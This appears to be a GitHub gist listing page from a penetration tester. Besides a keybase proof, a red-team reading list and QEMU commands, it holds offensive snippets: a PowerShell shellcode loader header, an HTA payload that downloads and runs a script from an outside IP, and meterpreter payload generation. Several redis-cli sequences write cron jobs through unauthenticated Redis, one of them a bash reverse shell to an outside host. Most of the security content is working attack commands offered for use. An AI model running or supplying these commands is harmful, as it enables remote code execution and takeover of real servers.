View keybase.md

Keybase proof

I hereby claim:

  • I am carnal0wnage on github.
  • I am carnal0wnage (https://keybase.io/carnal0wnage) on keybase.
  • I have a public key ASBAbr1taoZoDoZ5mQsko2BW675dxHpNRP-cenmfGfO03Qo

To claim this, I am signing this object:

View Invoke-WebDavDelivery.ps1
function Invoke-WebDavDelivery
{
<#
.SYNOPSIS
Receive a shellcode over WebDav PROPFIND channel, then load it into memory and execute it.
This script requires its server side counterpart (webdavdelivery.py) to communicate with and actually deliver the payload data.
Function: Invoke-WebDavDelivery
Author: Arno0x0x, Twitter: @Arno0x0x
View gist:606c41ac6ec40bf5c69d4db96d9312e3
From: http://redteams.net/bookshelf/
Techie
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
View windows10qemu.sh
# Installing
qemu-system-x86_64 -bios /usr/share/ovmf/ovmf_x64.bin -enable-kvm -cpu host -smp 4 -m 2048 -cdrom ~/Downloads/Win10_English_x64.iso -net nic,model=virtio -net user -drive file=~/vm/win10.hd.img.raw,format=raw,if=virtio -vga qxl -drive file=~/Downloads/virtio-win-0.1.105.iso,index=1,media=cdrom
# Running
qemu-system-x86_64 -bios /usr/share/ovmf/ovmf_x64.bin -enable-kvm -cpu host -smp 4 -m 4096 -net nic,model=virtio -net user -drive file=~/vm/win10.hd.img.raw,format=raw,if=virtio -vga qxl -usbdevice tablet -rtc base=utc
View DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links
View gist:93a9a8fa20acd0d62d0343b438710db8
root@weisuo.org:~# cat hta-psh.txt
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
# cat hta-psh.txt |redis-cli -x -h 192.168.138.27 set a
OK
#msfconsole
use payload/windows/meterpreter/reverse_tcp
generate -t hta-psh -f /var/www/1.ps1
#cat 1.ps1
View gist:b5e8ae7a489207c58f54cfaa7b37718d
echo " " > /tmp/zz
cat /tmp/w >> /tmp/zz
/bin/sh /tmp/zz
redis-cli get r
* * * * * sleep 10;/bin/sh /tmp/zz
View gist:5a9578a66484435b9685e03a27c9d3fc
redis-cli flushall
redis-cli set 2 ';a=`redis-cli get c`;'
redis-cli set 1 'id;redis-cli set r `$a`;#'
redis-cli config set dir /tmp/
redis-cli config set dbfilename w
redis-cli save
redis-cli set c whoami
from https://phpinfo.me/2016/07/07/1275.html
View gist:01963c7a36235e90c11ef8756e76d3d5
redis-cli flushall # 为了方便测试
redis-cli set test 'test'
redis-cli set my 'mymymymymymymymymymymymy'
redis-cli set word 'wordwordwordwordwordword'
redis-cli set hello 'ringzero'
redis-cli set word1 'word1word1word1word1word1word1'
echo -e "\n\n*/1 * * * * /bin/touch /tmp/888\n\n"|redis-cli -x set 1
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root
redis-cli save
View gist:df7082a56f1d7bc9681ceb3fea65c0fe
redis-cli flushall
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -x set 1
redis-cli config set dir /var/spool/cron/
redis-cli config set dbfilename root
redis-cli save
from https://phpinfo.me/2016/07/07/1275.html